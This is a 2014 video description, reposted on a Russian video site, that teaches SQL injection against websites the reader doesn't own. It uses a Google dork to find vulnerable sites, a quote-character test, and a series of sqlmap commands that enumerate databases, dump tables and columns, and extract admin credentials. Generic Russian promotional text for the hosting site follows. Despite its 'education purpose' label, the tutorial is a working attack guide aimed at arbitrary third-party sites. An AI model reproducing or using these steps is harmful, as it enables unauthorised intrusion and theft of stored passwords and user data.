hack websites using sql injection
#SQL INJECTION TUTORIAL
#DP_MMX
#10 OCT 2014
NOTE : THIS TUTORIAL ONLY FOR EDUCATION PURPOSE.
OS requirement:
windows xp and above
Software requirements :
* python : https://www.python.org/downloads/windows/
* sqlmap : http://sqlmap.org/
* download link for google dork : http://www.4shared.com/office/iBpu5coIba/dork.html
download and install them properly
first using google dork we gonna find out vulnerable websites
google dork :- inurl: id=
type this on google search and hit enter
choose one of the result and open it
after that go to the url and add '
if the website is vulnerable then it show some error
now open command promot
and go to the sqlmap directory on your computer
and type
python sqlmap.py -u www.victim.com --dbs
after getting the databasename, type
python sqlmap.py -u www.victim.com -D databasename --tables
it show you tablenames under the databasename
now you can dump the data as like either table or columnwise
fordump the entire table type:
python sqlmap.py -u www.victim.com -D databasename -T tablename --dump
or
shows columns under the table type :
python sqlmap.py -u www.victim.com -D databasename -T tablename --columns
dump the column of the table type:
python sqlmap.py -u www.victim.com -D databasename -T tablename -C columnname --dump
find admin table among them and dump the data
if you are fortunate enough then you get plain password
otherwise you got passhashes .
this is another topic .
i'll upload another video relating this soon..
thanks for watching!!! jai hind
Что делает видео по-настоящему запоминающимся? Наверное, та самая атмосфера, которая заставляет забыть о времени. Когда вы заходите на RUVIDEO, чтобы посмотреть онлайн «hack websites using sql injection», вы рассчитываете на нечто большее, чем просто загрузку плеера. И мы это понимаем. Контент такого уровня заслуживает того, чтобы его смотрели в HD 1080, без дрожания картинки и бесконечного буферизации.
Честно говоря, Rutube сегодня — это кладезь уникальных находок, которые часто теряются в общем шуме. Мы же вытаскиваем на поверхность самое интересное. Будь то динамичный экшн, глубокий разбор темы от любимого автора или просто уютное видео для настроения — всё это доступно здесь бесплатно и без лишних формальностей. Никаких «заполните анкету, чтобы продолжить». Только вы, ваш экран и качественный поток.
Если вас зацепило это видео, не забудьте взглянуть на похожие материалы в блоке справа. Мы откалибровали наши алгоритмы так, чтобы они подбирали контент не просто «по тегам», а по настроению и смыслу. Ведь в конечном итоге, онлайн-кинотеатр — это не склад файлов, а место, где каждый вечер можно найти свою историю. Приятного вам отдыха на RUVIDEO!
Видео взято из открытых источников Rutube. Если вы правообладатель, обратитесь к первоисточнику.